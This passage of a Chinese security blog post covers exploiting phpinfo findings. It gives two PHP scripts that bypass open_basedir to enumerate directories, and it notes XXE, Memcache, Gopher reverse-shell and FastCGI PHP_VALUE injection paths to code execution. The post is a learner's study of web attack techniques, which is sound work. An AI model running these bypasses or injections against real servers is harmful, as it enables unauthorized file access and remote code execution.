phpinfo信息利用( 二 )


文章插图
 
2、realpath列举目录
利用realpath对传入路径的回显不同加上通配符进行列举
本地环境linux就没有进行测试 。
<?phpini_set('open_basedir', dirname(__FILE__));printf("<b>open_basedir: %s</b><br />", ini_get('open_basedir'));set_error_handler('isexists');$dir = 'd:/test/';$file = '';$chars = 'abcdefghijklmnopqrstuvwxyz0123456789_';for ($i=0; $i < strlen($chars); $i++) {$file = $dir . $chars[$i] . '<><';realpath($file);}function isexists($errno, $errstr){$regexp = '/File((.*)) is not within/';preg_match($regexp, $errstr, $matches);if (isset($matches[1])) {printf("%s <br/>", $matches[1]);}}?>首先设置open_basedir为当前目录,并枚举d:/test/目录下的所有文件 。
将错误处理交给isexists函数,在isexists函数中匹配出目录名称,并打印出来 。
 
3、SplFileInfo::getRealPath列举目录
不需要考虑open_basedir开不开起 。
<?phpini_set('open_basedir', dirname(__FILE__));printf("<b>open_basedir: %s</b><br />", ini_get('open_basedir'));$basedir = 'D:/test/';$arr = array();$chars = 'abcdefghijklmnopqrstuvwxyz0123456789';for ($i=0; $i < strlen($chars); $i++) {$info = new SplFileInfo($basedir . $chars[$i] . '<><');$re = $info->getRealPath();if ($re) {dump($re);}}function dump($s){echo $s . '<br/>';ob_flush();flush();}?>还有GD库imageftbbox/imagefttext列举目录bindtextdomain暴力猜解目录,基本也都是要暴力破解,效率比较低 。
还有这篇文章php5全版本绕过open_basedir读文件脚本给跪了
https://www.leavesongs.com/bypass-open-basedir-readfile.html
 
三.扩展 
imagick
这个的远程执行
libxml
libxml 2.9以前的版本默认支持并开启了外部实体的引用,服务端解析用户提交的 xml 文件时未对 xml 文件引用的外部实体(含外部普通实体和外部参数实体)做合适的处理,会导致XXE 。
 
memcache
Memcache未授权访问漏洞利用及修复:
http://blog.nsfocus.net/memcache-unauthorized-access-exploit/
 
redis
这个不多说了……
session
xdebug
GOPHER
利用 Gopher 协议拓展攻击面:
https://blog.chaitin.cn/gopher-attack-surfaces/
看了下尝试复现没有成功,我的理解是首先要支持gopher协议,然后找到一个能执行curl会话的参数,构造gopher格式的payload以post格式去执行反弹shell 。(并没有看懂是怎么利用的)
 
fastcgi
https://www.leavesongs.com/PENETRATION/fastcgi-and-php-fpm.html#php-fpmfastcgi
通过fastcgi传入环境变量,设置
'PHP_VALUE': 'auto_prepend_file =php://input','PHP_ADMIN_VALUE': 'allow_url_include = On'将执行的代码放在body中执行任意代码 。
 
四.总结从刚接触安全的时候就知道phpinfo里有很重要的信息,然而就在前几天我还直接提了个信息泄露(还撞了,丢脸),复现完真的学到很多 。
 
参考链接:
https://www.freebuf.com/articles/web/79830.html
http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0151653.html
https://bbs.ichunqiu.com/thread-3234-1-1.html
作者:HACK-Learn 转载自 https://www.secpulse.com/archives/117762.html
原文地址
作者Phyb0x,zeroyu
http://zeroyu.xyz/2018/11/13/what-phpinfo-can-tell-we/

【phpinfo信息利用】


推荐阅读